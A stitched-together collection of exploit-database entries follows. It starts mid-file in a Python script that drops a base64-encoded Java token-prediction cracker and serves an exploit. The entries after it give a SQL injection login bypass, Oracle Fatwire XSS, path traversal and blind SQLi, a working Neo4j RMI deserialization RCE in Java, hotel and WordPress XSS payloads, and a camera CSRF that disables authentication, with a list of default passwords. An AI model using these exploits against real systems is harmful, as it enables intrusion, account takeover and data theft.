LyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg=="
#
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
with open("ViewstateCracker.java","w") as f:
f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
exploit_handler = ExploitHandler
PORT = 6010
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
exploit_server.serve_forever()
# Exploit Title: Men Salon Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-07-30
# Exploit Author: Akshay Khanna (ConfusedBot)
# Vendor Homepage: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Kali Linux
*POC*
Step 1 - Go to URL http://localhost:8080/Men/Salon/Management/System/Project/msms/admin/index.php
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step4 – Change the username to admin ' or '1'='1'#
Step 5 – Click forward and now you will be logged in as admin.
REQUEST
POST /Men/Salon/Management/System/Project/msms/admin/index.php HTTP/1.1
Host: localhost:8080
Content-Length: 67
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
http://localhost:8080/Men%20Salon%20Management%20System%20Project/msms/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fmo6opiohab5jf02r13db3f459
Connection: close
username=admin+%27+or+%271%27%3D%271%27%23&password=a&login=Sign+In
# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
# Date: 29/07/2021
# Exploit Author: J. Francisco Bolivar @Jfran_cbit
# Vendor Homepage: https://www.oracle.com/index.html
# Version: 6.3
# Tested on: CentOS
1. Xss
Adt parameter is vulnerable to Xss:
https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img
src="a" onerror=alert(document.cookie);>
2. Path Traversal
https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
3. Blind Sql injection
POST
/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice
HTTP/1.1
Host: IPaddress
pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX
The vulnerable parameter is : id_ex (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND
3958=3958&command=xxxxxT
# Exploit Title: Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)
# Date: 7/30/21
# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
# Vendor Homepage: neo4j.com
# Software Link: https://neo4j.com/download-thanks/?edition=community&release=3.4.18&flavour=unix
# Version: 3.4.18
# Tested on: Windows, Mac
In older versions of Neo4j, when the shell server is enabled, RCE can be obtained via a Java deserialization exploit. In the ShellServer interface, a method setSessionVariable(Serializable paramSerializable, String paramString, Object paramObject) exists. Neo4j also has a dependency (rhino 1.7.9) with known RCE gadget chains. By crafting an object to abuse these gadget chains, one obtain RCE via the shell server.
To create this from scratch using Java, you’ll need to modify the ysoserial library to include the payload found here https://github.com/mozilla/rhino/issues/520 (an update of the existing rhino gadget) as well as modify the ysoserial POM file to include the correct version of rhino. Rebuild ysoserial and include it on your exploit’s classpath. From there, you can use the ShellServer interface and associated code found in neo4j-shell-3.4.18.jar to make your client aware of the server’s method stubs. Now you should be able to call the setSessionVariable method from your exploit/client via RMI.
In your exploit, use ysoserial to generate a payload as follows: Object payload = new RhinoGadget().getObject(COMMAND), and then call the setSessionVariable with the payload in the paramObject parameter. The other two parameters can be anything. This will cause the server to deserialize your payload, triggering the gadget chain, and running your command.
It is worth noting that we chose to exploit this method and the paramObject parameter as this was the most direct, any method that takes in an Object (other than String or a primitave) is likely vulnerable as well.
package runnable;
import payloads.RhinoGadget;
import sun.rmi.registry.RegistryImpl_Stub;
import java.io.Serializable;
import java.rmi.Naming;
import org.neo4j.shell.ShellServer;
public class ExploitB {
public static String COMMAND = "touch /tmp/test.txt";
public static String TARGET = "rmi://127.0.0.1:1337";
public static String TARGET_BINDING = "shell";
public static void main (String args[]) throws Exception {
boolean validBinding = checkBinding(TARGET_BINDING, TARGET);
if (!validBinding)
{
System.out.println("[-] No valid binding found, shell server may not be listening. Exiting");
System.exit(0);
}
System.out.println("[+] Found valid binding, proceeding to exploit");
ShellServer server = (ShellServer) Naming.lookup(TARGET + "/" + TARGET_BINDING);
Object payload = new RhinoGadget().getObject(COMMAND);
//Here server.shutdown may also be callable without auth, just in case the exploit fails and you just want to turn the thing off
try {
server.setSessionVariable(newClientId(), "anything_here", payload);
}
catch (Exception UnmarshalException ) {
System.out.println("[+] Caught an unmarshalled exception, this is expected.");
}
System.out.println("[+] Exploit completed");
}
/**
* Just a helper method to validate that the rmi binding we're looking for is present
* @param bindingToCheck the binding you'd like to check for
* @param targetToCheck the rmi registry to check against
* @return true if the binding is present, false if not
*/
public static boolean checkBinding(String bindingToCheck, String targetToCheck) {
System.out.println("Trying to enumerate server bindings: ");
try {
RegistryImpl_Stub stub = (RegistryImpl_Stub) Naming.lookup(targetToCheck);
for (String element : stub.list()) {
System.out.println("Found binding: " + element);
if (element.equalsIgnoreCase(bindingToCheck))
return true;
}
return false;
}
catch (Exception ex)
{
return false;
}
}
public static Serializable newClientId() {
return Integer.valueOf(1);
}
}
# Exploit Title: Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)
# Date: 2021-08-02
# Exploit Author: Mohammad Koochaki
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/marimar.zip
# Version: 1.0
# Tested-on: Ubuntu 20.04.2 LTS, PHP 7.4.3
### This application is prone to a cross-site scripting in the 'arrival' and 'departure' parameters at the following path:
- http://localhost/marimar/index.php?p=booking
### Payload: "></div><script>alert("XSS-MSG")</script>
### PoC:
POST /marimar/index.php?p=booking HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/marimar/index.php?p=booking
Cookie: PHPSESSID=9ck943m19rugu8d7q7d6mh6fnt
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
arrival="></div><script>alert("arrival")</script>&departure="></div><script>alert("departure")</script>&person=0&accomodation=0
# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
# Date: 13.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.panasonic.com
<!--
Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password
Vendor: Panasonic Corporation | SANYO Electric Co., Ltd.
Product web page: https://www.panasonic.com
https://www.sanyo-av.com
https://panasonic.net/sanyo/cs/index.html
Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07), SubVer: 1.01-00 (100528-00)
Model: VCC-HD3300, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02), SubVer: 1.01-00 (100528-00)
Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Summary: SANYO network camera and network optional board with the
latest H.264 compression technology provide the optimum surveillance
applications with high quality real time moving image at low bandwidth.
Simultaneous stream of H.264 and JPEG data and also COAX video out
to provide flexible solution for digital and analogue combined system.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. These actions can be exploited to perform authentication
detriment and account password change with administrative privileges if
a logged-in user visits a malicious web site.
Tested on: Embedded Linux
CGI
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5659
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php
13.07.2021
-->
[CSRF]
[Anonymous user log in = ON]
orororororororororororororor
[Change admin password]
<html>
<body>
<form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST">
<input type="hidden" name="anonymous_sw" value="1" /> <!--Disable authentication-->
<input type="hidden" name="admin1_pw" value="Ztream0017" /> <!--Change admin password-->
<input type="hidden" name="admin2_pw" value="******" />
<input type="hidden" name="admin3_pw" value="******" />
<input type="hidden" name="operator_pw" value="********" />
<input type="hidden" name="guest_pw" value="*****" />
<input type="submit" value="Push" />
</form>
</body>
</html>
<!--
[Defaults]
admin:admin
admin2:admin2
admin3:admin3
operator:operator
operator2:operator2
guest:guest
-->
# Exploit Title: WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)
# Date: 2021-08-03
# Exploit Author: Aryan Chehreghani
# Software Link: https://wordpress.org/plugins/customize-login/
# Version: 1.1
# Tested on: Windows 10
How to Reproduce this Vulnerability:
1. Install WordPress 5.8
2. Install and activate WP Customize Login
3. Navigate to Customize Login under Settings Tab >> enter the XSS payload into the Change Logo Title input field.
4. Click Save Changes.
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
6. Payload Used: "><script>alert(document.cookie)</script>